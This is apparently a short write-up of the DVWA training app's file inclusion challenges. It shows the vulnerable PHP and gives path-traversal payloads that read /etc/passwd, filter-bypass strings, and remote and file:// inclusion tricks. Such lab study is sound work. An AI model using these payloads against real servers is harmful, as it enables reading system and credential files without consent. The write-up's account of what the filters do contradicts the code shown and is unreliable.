DVWA Series - File Inclusion

This is a writeup about File Inclusion challenges from DVWA(Damn Vulnerable Web App). Let's start.

DISCLAIMER: I DON'T PROMOTE THE USE OF THIS CODE IN A MALICIOUS WAY. HACKING DONE MUST BE DONE LEGALLY WITH CONSENT.

Low

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

?>

This is the code that is given. The get request is as follows  - yourip/vulnerabilities/fi/?page=. We can add ../ to the page parameter to move on directory up. Add a bunch of them and we're in the home directory. Then add /etc/passwd to get the password file.

We can also add any url to the parameter to get the website. This can be used for phishing attacks.

Payload : 1. ../../../../../../../../etc/passwd

                2. http://www.google.com/

Medium

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );

?>

Two things are happening here. In the first replace, http:// is converted to https:// so that we can't include malicious url in the get request. This can be circumvented by using the HTTP://.

The second thing is that ../ is replaced by ..\. This can be circumvented by replace ../ with ....//../. Here the / is placed between two ../. Hence after they are removed we'll get ../.

Payload: 1. HTTP://google.com

                2. ....//../....//../....//../....//../....//../....//../etc/passwd

High

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

Here the url can only contain parameters containing file parameters. So we can only access local files. We can circumvent this by adding / character a bunch of times and adding /etc/passwd to the end of it.

Payload: file:///////etc/passwd